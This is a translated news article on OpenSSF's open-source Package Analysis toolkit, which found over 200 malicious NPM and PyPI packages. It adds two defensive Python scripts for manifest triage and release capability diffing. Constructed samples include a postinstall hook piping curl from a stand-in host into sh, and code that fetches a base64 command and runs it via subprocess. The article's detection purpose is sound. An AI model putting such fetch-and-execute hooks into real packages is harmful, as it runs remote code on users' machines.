An analyzer that detected 200 malicious packages in NPM and PyPI has been published

OpenSSF (Open Source Security Foundation), founded by the Linux Foundation with the goal of improving the security of open source software, has released the open-source Package Analysis toolkit, which provides a system for checking packages for the presence of malicious code. The project's code is written in Go and distributed under the Apache 2.0 license. An initial analysis of the NPM and PyPI repositories with the proposed tool identified more than 200 previously undetected malicious packages.

Most of the problematic packages identified either rely on name collisions with trusted non-public (internal) packages (a dependency confusion attack) or use typosquatting (choosing names that resemble those of popular libraries), and they invoke scripts that contact external hosts during the installation process. According to the developers of the Package Analysis toolkit, many of the problematic packages found were created by security researchers taking part in bug bounty programs, since the data sent consisted only of the user name and system name and the activity was carried out openly, without any attempt to hide its nature.

Packages exhibiting malicious behavior include:

  • The PyPI package discordcmd, which was caught sending requests to raw.githubusercontent.com, the Discord API and ipinfo.io. This package downloaded backdoor code from GitHub and installed it into the directory of the Discord Windows client, after which it began searching the file system for Discord tokens and sending them to an external Discord server controlled by the attackers.
  • The NPM package Colorss also attempted to send tokens from a Discord account to an external server.
  • The NPM package @roku-web-core/ajax: during installation it sent data about the system and launched a handler (reverse shell) that accepted an external connection and executed commands.
  • The PyPI package secrevthree: launched a reverse shell when one of its modules was imported.
  • The NPM package random-vouchercode-generator: when the library was imported, it sent a request to an external server, which returned a command and the time at which it should be run.
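The patterns listed above (install-time hooks that reach out to external hosts, typosquatted names, and dependency confusion) can be pre-screened at the manifest level before a package is ever executed. The following script is an added example written for this article, not code from the OpenSSF Package Analysis project; the popular-name list, the internal package names, the package.json and the package-lock.json it inspects are all constructed stand-ins for real registry and allowlist data.

```python
"""Manifest-level triage of an npm package: install hooks, remote fetches in
those hooks, typosquatting and dependency confusion.  Constructed example;
the name lists below are assumptions, not real registry data."""
import json
import re

# Hypothetical allowlist of popular public package names (constructed).
POPULAR_NAMES = {"colors", "lodash", "express", "chalk", "request"}
# Hypothetical names of an organisation's private packages (constructed).
INTERNAL_NAMES = {"acme-auth-client", "acme-billing"}
# npm lifecycle scripts that run arbitrary commands at install time.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Crude marker for a hook that downloads something from the network.
FETCH_RE = re.compile(r"\b(curl|wget)\b|https?://")


def levenshtein(a, b):
    """Edit distance; catches names that are one or two typos away from a popular one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(manifest_json, lock_json=None):
    """Return a list of (rule, detail) findings for a package.json string and
    an optional package-lock.json (lockfile v2/v3) string."""
    m = json.loads(manifest_json)
    findings = []
    name = m.get("name", "")

    # 1. Lifecycle hooks execute code during installation; flag them, and
    #    flag separately when the hook pulls content from the network.
    for hook in LIFECYCLE_HOOKS:
        cmd = m.get("scripts", {}).get(hook)
        if cmd:
            findings.append(("install-hook", f"{hook}: {cmd}"))
            if FETCH_RE.search(cmd):
                findings.append(("install-hook-fetches-remote", f"{hook}: {cmd}"))

    # 2. Typosquatting: the unscoped name is close to, but not equal to, a popular name.
    bare = name.split("/")[-1]
    for pop in POPULAR_NAMES:
        if bare != pop and levenshtein(bare, pop) <= 2:
            findings.append(("typosquat-candidate", f"{name} ~ {pop}"))

    # 3. Dependency confusion: a dependency carrying one of our internal names
    #    was resolved from the public registry instead of the private one.
    if lock_json:
        lock = json.loads(lock_json)
        for dep, info in lock.get("packages", {}).items():
            dep_name = dep.split("node_modules/")[-1]
            resolved = info.get("resolved", "")
            if dep_name in INTERNAL_NAMES and "registry.npmjs.org" in resolved:
                findings.append(("dependency-confusion", f"{dep_name} <- {resolved}"))
    return findings


# Constructed sample manifest resembling the typosquatting + install-hook pattern.
SAMPLE_MANIFEST = json.dumps({
    "name": "colorss",
    "version": "1.0.0",
    "scripts": {"postinstall": "curl https://example.invalid/setup.sh | sh"},
})

# Constructed lockfile: an internal name resolved from the public registry.
SAMPLE_LOCK = json.dumps({
    "packages": {
        "node_modules/acme-auth-client": {
            "version": "9.9.9",
            "resolved": "https://registry.npmjs.org/acme-auth-client/-/acme-auth-client-9.9.9.tgz",
        },
        "node_modules/lodash": {
            "version": "4.17.21",
            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
        },
    }
})

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_MANIFEST, SAMPLE_LOCK):
        print(f"{rule:32} {detail}")
```

The lockfile check is the practical defence against dependency confusion: a private package name should never resolve to a public registry URL, so any such entry in a lockfile points at either a misconfigured registry scope or a hijacked name. The typosquat check is deliberately loose (edit distance of two) because it is a cheap pre-filter meant to feed a dynamic analysis stage, not a verdict on its own.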

The work of Package Analysis comes down to examining the package contents and source code for the creation of network connections, file access and command execution. In addition, changes in package state are analyzed in order to detect malicious insertions added to a new release of software that was previously harmless. To monitor the appearance of new packages in repositories and track changes to previously submitted packages, the Package Feeds tool is used, which unifies work with the NPM, PyPI, Go, RubyGems, Packagist, NuGet and Crates repositories.
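The two analysis ideas in the paragraph above, extracting network/file/exec capabilities from a package and comparing them between releases, can be illustrated with a small static pass over Python source. The script below is an added example written for this article and is not the OpenSSF Package Analysis code (which observes packages at run time in a sandbox rather than inspecting the AST); the capability-to-module mapping is an assumed, deliberately coarse model, and both release sources are constructed.

```python
"""Capability extraction from Python package source via the ast module, plus a
diff between two releases to spot a newly added capability.  Constructed
example; the module/call mappings are a coarse assumption, not a standard."""
import ast

# Modules whose import grants a capability (assumed mapping, exact-match).
# Coarse on purpose: importing os is treated as potential command execution.
CAPABILITY_MODULES = {
    "network": {"socket", "urllib", "urllib.request", "http.client", "requests", "ssl"},
    "filesystem": {"shutil", "glob", "pathlib", "os.path"},
    "exec": {"subprocess", "os"},
}
# Builtins and dotted calls that execute code or shell commands (assumed mapping).
EXEC_CALLS = {
    "exec", "eval", "compile",
    "os.system", "os.popen",
    "subprocess.Popen", "subprocess.run", "subprocess.call",
}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None if the chain starts
    with something else (e.g. a call result like f().read)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def capabilities(source):
    """Return {capability: sorted evidence strings} found in one Python source string."""
    tree = ast.parse(source)
    found = {}

    def add(cap, evidence):
        found.setdefault(cap, set()).add(evidence)

    for node in ast.walk(tree):
        # Imports: map the module name to a capability.
        mods = []
        if isinstance(node, ast.Import):
            mods = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            mods = [node.module]
        for mod in mods:
            for cap, names in CAPABILITY_MODULES.items():
                if mod in names:
                    add(cap, f"import {mod}")
        # Calls: code/command execution and file opening.
        if isinstance(node, ast.Call):
            callee = _dotted(node.func)
            if callee in EXEC_CALLS:
                add("exec", f"call {callee}")
            elif callee == "open" or (callee or "").endswith(".open"):
                add("filesystem", f"call {callee}")
    return {cap: sorted(ev) for cap, ev in found.items()}


def capability_diff(old_source, new_source):
    """Capabilities present in the new release but entirely absent from the old one:
    the signal for a malicious insertion into a previously harmless package."""
    old, new = capabilities(old_source), capabilities(new_source)
    return {cap: ev for cap, ev in new.items() if cap not in old}


# Constructed "harmless" release: reads a local JSON config file.
OLD_RELEASE = '''
import json
from pathlib import Path

def load_config(p):
    return json.loads(Path(p).read_text())
'''

# Constructed follow-up release: same API, but a new function fetches a
# command from a remote host and runs it (the pattern described in the article).
NEW_RELEASE = '''
import json
import base64
from pathlib import Path
import urllib.request
import subprocess

def load_config(p):
    return json.loads(Path(p).read_text())

def _update():
    cmd = urllib.request.urlopen("https://example.invalid/c").read()
    subprocess.run(base64.b64decode(cmd), shell=True)
'''

if __name__ == "__main__":
    for cap, evidence in capability_diff(OLD_RELEASE, NEW_RELEASE).items():
        print(f"new capability in release: {cap}: {', '.join(evidence)}")
```

Applied to the two constructed releases, the diff reports that network and exec capabilities appeared between versions while the filesystem capability was already present; that is exactly the kind of state change the paragraph describes as worth escalating to dynamic analysis. Static import matching is easy to evade (for example via `__import__` with an obfuscated string), which is why the OpenSSF project relies on sandboxed execution rather than source inspection alone.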

The Package Analysis toolkit consists of three main components that can be used both together and separately:

  • A scheduler that initiates package analysis tasks based on data from the package feed.
  • An analyzer that directly examines a package and evaluates its behavior using static analysis and dynamic detection methods. The tests are performed in an isolated environment.
  • A loader that places the test results into BigQuery storage.

Source: opennet.ru
